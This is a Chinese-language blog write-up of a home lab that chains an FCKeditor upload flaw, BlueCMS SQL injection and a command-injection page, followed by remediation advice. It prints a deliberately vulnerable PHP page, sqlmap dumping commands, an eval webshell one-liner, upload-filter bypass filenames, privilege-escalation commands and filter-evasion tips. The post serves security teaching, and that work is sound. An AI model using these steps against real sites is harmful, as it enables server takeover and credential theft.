Web安全实战：FCKeditor文件上传、BlueCMS注入与RCE漏洞复现

1. 项目概述：一次贴近实战的Web安全漏洞复现演练

最近在整理自己的渗透测试学习笔记，翻到了几年前做的一个综合性的漏洞复现项目。这个项目把当时几个非常典型且影响深远的Web漏洞放在了一起，搭建了一个模拟的靶场环境，目标就是通过实战操作，把漏洞原理、利用手法和修复思路彻底吃透。这几个漏洞分别是：经典的FCKeditor编辑器文件上传漏洞、BlueCMS的SQL注入漏洞（常被用于旁站攻击）、以及一个模拟的远程代码执行漏洞环境。对于刚入门Web安全的朋友来说，这类综合性的靶场练习价值非常大，它不像单一漏洞那么枯燥，能让你在接近真实网络环境（多个站点、多种技术栈）中串联起信息收集、漏洞探测、权限提升的完整链条。今天我就把这个项目的详细过程、踩过的坑以及背后的思考重新梳理一遍，希望能给正在路上的安全研究员们一些实实在在的参考。

2. 环境搭建与靶场拓扑设计

2.1 靶场核心组件与拓扑逻辑

这次复现的核心是构建一个包含多个脆弱站点的模拟内网环境。我选择在本地虚拟机中使用VMware搭建，主要考虑了环境的隔离性和可重置性。靶场拓扑设计如下：

1. 核心靶机（IP: 192.168.1.100）：这是一台安装了Windows Server 2008 R2的虚拟机，并配置了WAMP（Windows + Apache + MySQL + PHP）集成环境。在这台服务器上，我部署了三个独立的Web应用：
   • 站点A（www.vuln-site-a.local）：一个自定义的、存在未授权访问和命令执行漏洞的简单PHP应用，用于模拟远程代码执行场景。
   • 站点B（www.vuln-site-b.local）：安装了存在漏洞的旧版本FCKeditor（2.4.3或更早）的内容管理系统（CMS）。
   • 站点C（www.bluecms.local）：部署了存在已知SQL注入漏洞的BlueCMS v1.6。
2. 辅助设备：我的物理机（Kali Linux， IP: 192.168.1.50）作为攻击机，上面配备了Burp Suite、Nmap、Sqlmap、中国菜刀（或替代的WebShell管理工具）等全套渗透测试工具。

这个拓扑模拟了一个常见的场景：一台服务器上通过虚拟主机或目录形式运行着多个业务站点（站点A、B、C）。攻击者最初可能只发现其中一个站点（如站点C）存在漏洞，但最终目标可能是其他更有价值的站点（如站点A）。这就需要利用“旁注”思路，从一个点突破，横向渗透到整台服务器。

注意：所有用于复现的漏洞利用代码、WebShell及靶场环境务必在完全隔离的虚拟机或本地环境中进行，严禁对任何未经授权的真实系统进行测试。相关漏洞软件包应从可靠的漏洞库或历史镜像站获取，切勿使用来源不明的程序。

2.2 关键漏洞应用部署细节

站点A（RCE模拟）：我写了一个极其简单的PHP页面，文件名为rce_test.php，代码如下：

<?php // 模拟存在命令执行漏洞的参数 if(isset($_GET['cmd'])) { system($_GET['cmd']); } // 模拟存在文件包含漏洞的参数 if(isset($_GET['file'])) { include($_GET['file']); } ?>

这个页面没有任何认证和过滤，直接通过cmd参数执行系统命令，通过file参数进行文件包含。它用来直观地演示RCE的危害。

站点B（FCKeditor）：下载FCKeditor 2.4.3的PHP版本，解压到站点B的根目录。关键是要找到并确认上传脚本的位置，通常是/editor/filemanager/connectors/php/upload.php。需要确保Apache配置允许执行PHP，并且上传目录（如/userfiles/）具有写权限。

站点C（BlueCMS）：下载BlueCMS v1.6，按照其安装向导完成部署。特别注意，在安装过程中，数据库配置环节要记录下数据库名、用户名和密码，后续的SQL注入利用会用到。安装完成后，访问其前台新闻列表页（如/show.php?newsid=1），这就是存在注入点的典型位置。

3. 漏洞原理深度剖析与利用链构建

3.1 FCKeditor编辑器文件上传漏洞解析

FCKeditor（后更名为CKEditor）在2.x版本的文件上传模块中存在严重的设计缺陷。其上传逻辑大致如下：用户通过编辑器上传文件时，请求会发送到服务端的upload.php。该脚本本应检查文件扩展名和内容，但在某些配置下（或默认配置中），对某些特定扩展名（如.asp,.aspx,.php,.jsp）的检查可以被绕过。

核心漏洞点在于，当时的上传校验可能只检查了文件名末尾的扩展名。攻击者可以构造一个文件名如shell.php.（末尾带点）或shell.php%20（空格URL编码）。在某些Windows服务器环境下，文件系统在保存时会自动去除末尾的点和空格，最终服务器上存储的文件名就变成了shell.php。此外，如果服务器配置了不当的MIME类型检查，或者允许上传.txt文件但后续能通过其他漏洞（如文件包含）将其当作代码执行，也会导致漏洞产生。

在实际利用中，我们通常直接尝试上传一个图片马（将WebShell代码嵌入图片的EXIF信息中），然后结合FCKeditor的“文件浏览”功能找到上传文件的路径，或者利用其默认的、可预测的存储路径来直接访问WebShell。

3.2 BlueCMS SQL注入与旁注攻击思路

BlueCMS v1.6的注入点非常经典，存在于/show.php文件的newsid参数。查看其早期版本的源码，可以发现类似这样的代码：

$newsid = $_GET['newsid']; $sql = "SELECT * FROM blue_news WHERE news_id=$newsid"; $result = mysql_query($sql);

这里对$newsid没有进行任何整数转换或过滤，直接拼接进了SQL语句。攻击者可以传入1 AND 1=1和1 AND 1=2来测试布尔盲注，或者使用1 UNION SELECT 1,2,3,4,5...来尝试联合查询，获取数据库名、表名、字段名，最终拖取管理员账号密码哈希值。

旁注攻击的精髓在于“曲线救国”。假设我们通过注入拿到了BlueCMS后台的管理员密码（可能是MD5哈希，需要破解或使用密码修改漏洞）。登录BlueCMS后台后，其功能可能有限。但我们的目标是同一台服务器上的其他站点（如站点A）。这时，我们需要在BlueCMS中寻找“写入文件”或“执行命令”的功能。例如：

1. 模板管理写Shell：很多CMS后台允许编辑模板文件。我们可以找到一个用于渲染的PHP模板文件，将WebShell代码写入其中。
2. 数据库备份功能：有些CMS有数据库备份功能，备份时可能会将SQL文件保存为.php扩展名，并在文件中插入PHP代码。当访问这个备份文件时，代码就会执行。
3. 插件/模块安装：上传一个伪装成合法插件、但内含后门的ZIP包。

一旦通过BlueCMS在服务器上获得了WebShell，我们就等同于控制了整个Web目录。接下来就可以浏览服务器上的其他网站目录，直接修改或添加站点A的敏感文件，从而实现对站点A的“旁注”攻击。

3.3 远程代码执行漏洞的通用利用模型

我搭建的站点A模拟的是一种最简单的RCE：直接命令注入。其利用模型适用于任何将未经验证的用户输入传递给系统命令执行函数（如PHP的system()、exec()、passthru()，Python的os.system()，Java的Runtime.exec()）的场景。

漏洞原理：应用程序为了执行某些系统功能（如Ping一个地址、查询系统状态），会调用命令行。如果用户输入（如IP地址、查询字符串）被直接拼接进命令字符串，攻击者就可以使用命令连接符（如;、&、|、&&、||，在Windows下还有%0a、&）来注入额外的命令。例如，原始命令是ping $_GET['ip']，攻击者传入127.0.0.1; whoami，最终执行的命令就变成了ping 127.0.0.1; whoami，从而执行了whoami命令。

利用扩展：获得一个简单的命令执行点（如whoami）只是开始。下一步通常是利用它来写入一个功能更全面的WebShell。在Linux下，可以使用echo、wget或curl命令将PHP代码写入网站目录。在Windows下，可能使用echo到文件，或者利用PowerShell。这个过程需要你对目标系统的环境（路径、权限、可用的命令行工具）有清晰的了解。

4. 分步实战攻击流程记录

4.1 第一阶段：信息收集与漏洞初探

首先从攻击机（Kali）对靶机进行基础信息收集：

nmap -sV -sC -O 192.168.1.100

扫描结果显示开放了80端口，运行Apache 2.2.x。通过访问IP，或者配置本地hosts文件解析三个域名，可以分别看到三个不同的站点。

对站点C（BlueCMS）进行漏洞探测：

1. 访问http://www.bluecms.local/show.php?newsid=1，页面正常显示。
2. 测试注入：访问http://www.bluecms.local/show.php?newsid=1 and 1=1，页面正常。访问http://www.bluecms.local/show.php?newsid=1 and 1=2，页面内容消失或报错。这初步表明存在布尔型SQL注入。
3. 使用Sqlmap进行自动化验证和利用：

   sqlmap -u "http://www.bluecms.local/show.php?newsid=1" --batch --dbs

   很快，Sqlmap识别出注入点，并爆出数据库名，比如bluecms。

4.2 第二阶段：BlueCMS注入深入与后台突破

1. 获取表名和字段名：

   sqlmap -u "http://www.bluecms.local/show.php?newsid=1" -D bluecms --tables sqlmap -u "http://www.bluecms.local/show.php?newsid=1" -D bluecms -T blue_admin --columns

   发现管理员表blue_admin，字段可能有admin_name,admin_pwd。
2. 拖取管理员凭据：

   sqlmap -u "http://www.bluecms.local/show.php?newsid=1" -D bluecms -T blue_admin -C "admin_name,admin_pwd" --dump

   得到类似admin和e10adc3949ba59abbe56e057f20f883e（123456的MD5）的结果。
3. 登录后台：寻找后台登录入口，通常是/admin/login.php。使用破解出的密码（或在线MD5解密网站尝试破解）登录后台。

4.3 第三阶段：旁注攻击——从BlueCMS到整台服务器

登录BlueCMS后台后，开始寻找写入WebShell的方法。

1. 方法一：模板编辑。在后台找到“模板管理”或“风格管理”，查看当前模板的PHP文件列表。选择一个不常被访问但肯定会被执行的页面，例如footer.php。在文件末尾添加一行PHP代码：

   <?php @eval($_POST['cmd']);?>

   保存。然后，直接访问http://www.bluecms.local/templates/default/footer.php（路径需根据实际情况调整），并使用中国菜刀或蚁剑等工具，连接密码cmd，即可获得一个WebShell。
2. 方法二：文件上传点。在后台寻找任何允许上传文件的功能，如图片管理、广告管理。尝试上传图片马（将<?php @eval($_POST['cmd']);?>写入一个图片的注释，或使用copy /b normal.jpg + shell.php trojan.jpg命令制作），然后结合文件包含漏洞（如果存在）执行。在本例中，我们已通过模板编辑获得Shell，此步作为备选。

通过WebShell提权与横向移动：

1. 在获得的WebShell中，执行whoami命令，查看当前Web服务运行的用户权限（通常是www-data、apache或nt authority\network service）。
2. 浏览服务器目录。尝试切换到其他站点的根目录。例如，在Linux下，/var/www/html/可能是公共目录，下面有siteA,siteB,siteC三个文件夹。在Windows下，可能是C:\xampp\htdocs\。
3. 直接向站点A的目录写入一个更隐蔽的WebShell。例如，在站点A的目录下创建一个404.php文件，内容为WebShell代码。这样，攻击者就间接控制了站点A。

4.4 第四阶段：FCKeditor漏洞的直接利用

与此同时，我们可以并行测试站点B的FCKeditor。

1. 定位上传接口：访问http://www.vuln-site-b.local/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php。如果直接能看到文件浏览器界面，说明上传功能是启用的。
2. 直接上传WebShell：使用Burp Suite拦截一个正常的图片上传请求。将请求中的文件名改为shell.php，文件内容为<?php phpinfo();?>。如果服务器直接返回了上传文件的路径（如/userfiles/2023/10/shell.php），则漏洞存在。
3. 绕过技巧：如果直接上传.php被拦截，尝试以下变种：
   • shell.php.(末尾加点)
   • shell.php%20(末尾加空格)
   • shell.pHp(大小写混淆)
   • 上传.jpg文件，但内容包含<?php ... ?>，然后利用服务器解析漏洞（如Apache的AddType配置错误）或结合本地文件包含执行。
4. 访问上传成功的WebShell地址，验证漏洞。

4.5 第五阶段：整合利用与权限提升

此时，我们可能通过多种途径在服务器上留下了后门。最终目标是获得更高的权限（如系统管理员权限）。

1. 信息收集：通过WebShell执行systeminfo、net user、ipconfig /all或cat /etc/passwd、ifconfig等命令，收集系统、用户、网络信息。
2. 寻找提权路径：
   • Windows：检查补丁情况（wmic qfe list brief），寻找缺失的提权漏洞EXP。检查是否有弱口令或默认口令的服务。查看当前用户是否有写入服务路径、计划任务路径的权限。
   • Linux：查找SUID权限的特殊文件（find / -perm -u=s -type f 2>/dev/null），如find、vim、bash等，看是否有已知的提权方法。检查sudo -l查看当前用户可以以root身份运行哪些命令。
3. 内网探测：如果靶机处于一个更复杂的模拟内网中，还可以利用已获得的Shell作为跳板，使用nmap、ping等命令扫描内网其他存活主机，尝试进行横向移动。

5. 漏洞修复与防御加固方案

5.1 FCKeditor漏洞修复

1. 升级：最根本的方法是升级到最新版的CKEditor，其上传模块已完全重写，安全性大幅提升。
2. 黑白名单结合：如果必须使用旧版，则严格限制上传文件的扩展名（白名单），只允许jpg、png、gif等图片格式。同时，禁止上传目录执行脚本（通过Apache/Nginx配置）。
3. 重命名与随机路径：对上传的文件进行重命名（如使用MD5值），并存储到无法直接访问的随机目录中。通过一个单独的、安全的下载脚本来读取文件。
4. 文件内容检查：使用getimagesize()等函数检查上传文件确实是有效的图片，而不仅仅是改了个扩展名。

5.2 BlueCMS SQL注入修复

1. 参数化查询（预编译语句）：这是最有效的防御手段。将SQL语句中的变量用占位符替代，然后预编译SQL模板，最后将用户输入作为参数绑定上去。这样，数据库会将输入始终当作数据处理，而非SQL代码的一部分。在PHP中，使用PDO或MySQLi扩展实现。

   // 使用PDO示例 $stmt = $pdo->prepare("SELECT * FROM blue_news WHERE news_id = ?"); $stmt->execute([$newsid]); $result = $stmt->fetchAll();

2. 严格类型过滤：对于newsid这种预期是整数的参数，在接收后强制转换为整数型：$newsid = intval($_GET['newsid']);。
3. 最小权限原则：连接数据库的账号不应具有DROP、FILE等高危权限，仅授予SELECT、INSERT、UPDATE等必要权限。

5.3 远程代码执行漏洞修复

1. 避免使用命令执行函数：尽可能使用语言内置的函数或安全的库来完成功能，而不是直接调用系统命令。
2. 严格过滤输入：如果必须使用命令执行，则对用户输入进行严格的过滤。使用白名单机制，只允许输入预期的、安全的字符（如IP地址只允许数字和点）。转义所有shell元字符（如;、&、|、>、<、$等）。
3. 使用安全的API：例如，在PHP中，使用escapeshellarg()或escapeshellcmd()函数对命令参数进行转义。

   $safe_ip = escapeshellarg($_GET['ip']); system("ping -c 4 " . $safe_ip);

5.4 旁注攻击的整体防御

1. 权限隔离：为每个Web站点配置独立的系统用户（如user_siteA,user_siteB），并利用操作系统的权限机制，确保每个用户只能访问自己站点目录的文件，无法读取或写入其他用户的目录。
2. 容器化隔离：使用Docker等容器技术，将每个站点运行在独立的容器中，实现进程、文件系统、网络的完全隔离。
3. Web服务器配置：在Apache或Nginx的虚拟主机配置中，使用open_basedir指令（PHP）或chroot环境，限制PHP脚本可以访问的目录范围。
4. 定期安全审计与代码审计：对网站代码，尤其是第三方组件（如编辑器、CMS）进行定期的安全检查和更新。

6. 常见问题与排查技巧实录

在复现过程中，我遇到了不少问题，这里总结一下：

问题1：Sqlmap跑不出BlueCMS的注入数据，一直报错。

• 排查：可能是Sqlmap的Payload被WAF或CMS的简单过滤拦截了。也可能是注入点需要特定的参数或Cookie状态。
• 解决：
  1. 使用--level和--risk提高检测等级。
  2. 尝试使用--tamper参数，调用space2comment、between等脚本对Payload进行混淆。
  3. 手动在浏览器中测试and 1=1和and 1=2，确认页面有明显差异后，使用Sqlmap的--string或--not-string参数指定识别成功与否的标志。
  4. 检查是否需要先访问首页获取有效的会话Cookie，再用--cookie参数提供给Sqlmap。

问题2：FCKeditor上传接口返回“无效文件”或“安全错误”，但历史漏洞资料说该版本存在漏洞。

• 排查：可能是服务器PHP配置对上传文件做了全局限制（如upload_max_filesize太小），或者是FCKeditor的配置文件中设置了更严格的黑名单。
• 解决：
  1. 检查FCKeditor的配置文件config.php或fckconfig.js，查找DeniedExtensions或AllowedExtensions配置项，尝试修改或注释掉相关限制。
  2. 使用Burp Suite仔细分析上传请求和响应的每一个细节，看错误信息是来自FCKeditor还是服务器。
  3. 尝试上传一个非常小的、内容纯净的文本文件（如test.txt），排除文件大小和内容干扰。

问题3：通过BlueCMS后台写入的WebShell无法连接，返回404或500错误。

• 排查：
  • 404：路径错误。WebShell文件没有保存到Web可访问的目录下，或者文件名/路径写错了。
  • 500：语法错误。写入的PHP代码可能存在语法问题，或者包含了不可用的字符（如BOM头）。
• 解决：
  1. 在WebShell中写入最简单的代码测试：<?php echo "test";?>。
  2. 通过WebShell的文件管理功能，确认文件确实存在于预期的Web目录中。
  3. 查看Web服务器的错误日志（Apache的error.log），里面通常会有具体的PHP语法错误信息。

问题4：在获得的WebShell中执行系统命令没有回显。

• 排查：可能是system()、exec()等函数被禁用（查看phpinfo()中的disable_functions），或者命令执行被安全软件拦截。
• 解决：
  1. 尝试使用其他PHP执行命令的函数，如shell_exec()、passthru()、popen()，或者反引号`command`。
  2. 将命令输出重定向到一个Web可读的文件中：whoami > /tmp/out.txt，然后通过浏览器访问这个文件。
  3. 使用编码或加密的方式传输命令和结果，绕过简单的字符串检测。

这个综合靶场练习让我深刻体会到，真实世界的渗透很少是单一漏洞的利用，往往是多个脆弱点串联的结果。从信息泄露到SQL注入，从后台突破到写入WebShell，再到横向移动和权限提升，每一步都考验着对系统、网络和应用程序的理解。对于防御者而言，修补一个已知漏洞固然重要，但建立纵深防御体系，做好权限隔离和输入过滤，才是应对这种“链条式”攻击的根本之道。在后续的学习中，我还会引入WAF绕过、免杀木马制作等更进阶的内容，让这个靶场持续进化，贴近最新的攻防对抗实践。